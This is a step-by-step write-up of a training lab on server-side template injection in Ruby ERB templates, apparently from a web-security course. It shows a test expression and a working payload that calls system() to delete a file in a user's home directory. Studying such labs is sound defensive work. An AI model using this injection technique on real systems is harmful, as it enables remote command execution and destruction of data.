+1 (512) 588 6950
This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.
To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the
morale.txt file from Carlos’s home directory.
2. Capture the Request on burp “if needed”
3. Let’s try to Insert the ERB code. The Syntax is below,
<%= someExpression %>
Code to Check:
<%= 5*5 %>
4. Look at the request, the URL Parameter is encoded, so we have to Encode the ERB code if we are sending in burp
Encoded Final Url (If Sending this in Burp):
5. Or you can Directly Insert the code into the message parameter on the browser to check
6. It is Working, So let’s Inject a payload to delete
7. From the Ruby documentation, discover the
system() method, which can be used to execute arbitrary operating system commands.
8. Construct a payload to delete Carlos’s file as follows:
<%= system("rm /home/carlos/morale.txt") %>
9. Inject the payload into the message parameter as below